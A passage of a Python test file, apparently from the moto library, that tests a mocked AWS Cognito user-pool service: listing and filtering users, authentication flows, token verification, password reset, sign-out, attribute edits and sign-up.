conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username) def _verify_attribute(name, v): attr = [a for a in result["Users"][0]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("email", username) username_bis = "test2@uexample.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username_bis, UserAttributes=[{"Name": "phone_number", "Value": "+33666666666"}], ) result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number="+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) uuid.UUID(result["Users"][0]["Username"]) _verify_attribute("email", username_bis) # checking Filter with space result = conn.list_users( UserPoolId=user_pool_id, Filter='phone_number = "+33666666666"' ) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should_not.equal(username_bis) _verify_attribute("email", username_bis) @mock_cognitoidp def test_list_users_inherent_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users(UserPoolId=user_pool_id) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) # create a confirmed disabled user client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] disabled_user_username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=disabled_user_username) conn.confirm_sign_up( ClientId=client_id, Username=disabled_user_username, ConfirmationCode="123456" ) conn.admin_disable_user(UserPoolId=user_pool_id, Username=disabled_user_username) # filter, filter value, response field, response field expected value - all target confirmed disabled user filters = [ ("username", disabled_user_username, "Username", disabled_user_username), ("status", "Disabled", "Enabled", False), ("cognito:user_status", "CONFIRMED", "UserStatus", "CONFIRMED"), ] for name, filter_value, response_field, response_field_expected_value in filters: result = conn.list_users( UserPoolId=user_pool_id, Filter='{}="{}"'.format(name, filter_value) ) result["Users"].should.have.length_of(1) result["Users"][0][response_field].should.equal(response_field_expected_value) @mock_cognitoidp def test_get_user_unconfirmed(): if settings.TEST_SERVER_MODE: raise SkipTest("Cant patch attributes in server mode.") conn = boto3.client("cognito-idp", "us-west-2") outputs = authentication_flow(conn, "ADMIN_NO_SRP_AUTH") backend = moto.cognitoidp.models.cognitoidp_backends["us-west-2"] user_pool = backend.user_pools[outputs["user_pool_id"]] user_pool.users[outputs["username"]].status = "UNCONFIRMED" with pytest.raises(ClientError) as ex: conn.get_user(AccessToken=outputs["access_token"]) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("username") @mock_cognitoidp def test_list_users_returns_limit_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): 
conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") @mock_cognitoidp def test_list_users_returns_pagination_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(max_results) result.should.have.key("PaginationToken") next_token = result["PaginationToken"] result_2 = conn.list_users( UserPoolId=user_pool_id, Limit=max_results, PaginationToken=next_token ) result_2["Users"].should.have.length_of(max_results) result_2.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_list_users_when_limit_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 users user_count = 10 for _ in range(user_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) max_results = user_count + 5 result = conn.list_users(UserPoolId=user_pool_id, Limit=max_results) result["Users"].should.have.length_of(user_count) result.shouldnt.have.key("PaginationToken") @mock_cognitoidp def test_admin_disable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_disable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(False) @mock_cognitoidp def test_admin_enable_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_enable_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, 
Username=username) conn.admin_disable_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_enable_user(UserPoolId=user_pool_id, Username=username) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.admin_get_user(UserPoolId=user_pool_id, Username=username)[ "Enabled" ].should.equal(True) @mock_cognitoidp def test_admin_delete_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as exc: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_admin_delete_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: conn.admin_get_user(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") def authentication_flow(conn, auth_flow): username = str(uuid.uuid4()) temporary_password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, UserAttributes=[{"Name": user_attribute_name, "Value": user_attribute_value}], ) result = conn.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow=auth_flow, AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password result["ChallengeName"].should.equal("NEW_PASSWORD_REQUIRED") result["Session"].should_not.be.none # This sets a new password and logs the user in (creates tokens) new_password = str(uuid.uuid4()) result = conn.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": new_password}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none return { "user_pool_id": user_pool_id, "client_id": client_id, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "username": username, "password": new_password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: authentication_flow(conn, auth_flow) def user_authentication_flow(conn): username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) 
user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up( ClientId=client_id, Username=username, Password=password, ) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) # generating secret hash key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) refresh_token = result["AuthenticationResult"]["RefreshToken"] # add mfa token conn.associate_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], ) conn.verify_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], UserCode="123456", ) conn.set_user_mfa_preference( AccessToken=result["AuthenticationResult"]["AccessToken"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True,}, ) result = conn.initiate_auth( ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters={"SECRET_HASH": secret_hash, "REFRESH_TOKEN": refresh_token,}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none # authenticate user once again this time with mfa token result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, Session=result["Session"], ChallengeName=result["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": username, "SECRET_HASH": secret_hash, }, ) return { "user_pool_id": user_pool_id, "client_id": client_id, "client_secret": client_secret, "secret_hash": secret_hash, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "refresh_token": refresh_token, "username": username, "password": password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_user_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") user_authentication_flow(conn) @mock_cognitoidp def test_token_legitimacy(): conn = boto3.client("cognito-idp", "us-west-2") path = "../../moto/cognitoidp/resources/jwks-public.json" with open(os.path.join(os.path.dirname(__file__), path)) as f: json_web_key = json.loads(f.read())["keys"][0] for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = 
authentication_flow(conn, auth_flow) id_token = outputs["id_token"] access_token = outputs["access_token"] client_id = outputs["client_id"] issuer = "https://cognito-idp.us-west-2.amazonaws.com/{}".format( outputs["user_pool_id"] ) id_claims = json.loads(jws.verify(id_token, json_web_key, "RS256")) id_claims["iss"].should.equal(issuer) id_claims["aud"].should.equal(client_id) id_claims["token_use"].should.equal("id") for k, v in outputs["additional_fields"].items(): id_claims[k].should.equal(v) access_claims = json.loads(jws.verify(access_token, json_web_key, "RS256")) access_claims["iss"].should.equal(issuer) access_claims["aud"].should.equal(client_id) access_claims["token_use"].should.equal("access") @mock_cognitoidp def test_change_password(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_change_password__using_custom_user_agent_header(): # https://github.com/spulec/moto/issues/3098 # As the admin_initiate_auth-method is unauthenticated, we use the user-agent header to pass in the region # This test verifies this works, even if we pass in our own user-agent header from botocore.config import Config my_config = Config(user_agent_extra="more/info", signature_version="v4") conn = boto3.client("cognito-idp", "us-west-2", config=my_config) for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. 
result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_forgot_password(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] result = conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) result["CodeDeliveryDetails"]["Destination"].should.not_be.none result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_client_id(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=create_id(), Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal("Username/client id combination not found.") @mock_cognitoidp def test_forgot_password_admin_only_recovery(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "admin_only", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Contact administrator to reset password.") @mock_cognitoidp def test_forgot_password_user_with_all_recovery_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "email", "Value": "test@moto.com"}, {"Name": "phone_number", "Value": "555555555"}, ], ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("test@moto.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("555555555") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_user_or_user_without_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": 
"verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] user_without_attributes = str(uuid.uuid4()) nonexistent_user = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=user_without_attributes) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal(user + "@h***.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal("+*******9934") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_confirm_forgot_password_legacy(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) # Random confirmation code - opt out of verification conn.forgot_password(ClientId=client_id, Username=username) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) res = conn.forgot_password(ClientId=client_id, Username=username) confirmation_code = res["ResponseMetadata"]["HTTPHeaders"][ "x-moto-forgot-password-confirmation-code" ] confirmation_code.should.match(r"moto-confirmation-code:[0-9]{6}", re.I) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=confirmation_code, Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification_invalid_confirmation_code(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode="moto-confirmation-code:123invalid", Password=str(uuid.uuid4()), ) err = 
ex.value.response["Error"] err["Code"].should.equal("ExpiredCodeException") err["Message"].should.equal("Invalid code provided, please request a code again.") @mock_cognitoidp def test_admin_user_global_sign_out(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username=result["username"], ) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Refresh Token has been revoked") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_userpool(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId="n/a", Username=result["username"], ) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_user(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username="n/a", ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_update_user_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, ], ) conn.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "Jane"}, ], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) attributes = user["UserAttributes"] attributes.should.be.a(list) for attr in attributes: val = attr["Value"] if attr["Name"] == "family_name": val.should.equal("Doe") elif attr["Name"] == "given_name": val.should.equal("Jane") @mock_cognitoidp def test_admin_delete_user_attributes(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "foo", "AttributeDataType": "String", "Mutable": True, "Required": False, } ], )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, {"Name": "custom:foo", "Value": "bar"}, ], ) conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserAttributes"].should.have.length_of(3) # family_name, given_name and sub user["UserAttributes"].should.contain({"Name": "family_name", "Value": "Doe"}) user["UserAttributes"].should.contain({"Name": "given_name", "Value": "John"}) user["UserAttributes"].should_not.contain({"Name": "nickname", "Value": "Joe"}) 
user["UserAttributes"].should_not.contain({"Name": "custom:foo", "Value": "bar"}) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_attribute(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, ], ) with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Invalid user attributes: user.custom:foo: Attribute does not exist in the schema.\n" ) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=str(uuid.uuid4()), UserAttributeNames=["nickname"], ) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_resource_server(): client = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) res = client.create_user_pool(PoolName=name) user_pool_id = res["UserPool"]["Id"] identifier = "http://localhost.localdomain" name = "local server" scopes = [ {"ScopeName": "app:write", "ScopeDescription": "write scope"}, {"ScopeName": "app:read", "ScopeDescription": "read scope"}, ] res = client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) res["ResourceServer"]["UserPoolId"].should.equal(user_pool_id) res["ResourceServer"]["Identifier"].should.equal(identifier) res["ResourceServer"]["Name"].should.equal(name) res["ResourceServer"]["Scopes"].should.equal(scopes) with pytest.raises(ClientError) as ex: client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) ex.value.operation_name.should.equal("CreateResourceServer") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "%s already exists in user pool %s." 
% (identifier, user_pool_id) ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) with pytest.raises(ClientError) as err: # Attempt to add user again result = conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("InvalidParameterException") username = "test@example.com" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none username = "+123456789" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) # Add initial user conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as err: # Attempt to add user again conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("UsernameExistsException") @mock_cognitoidp def test_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) 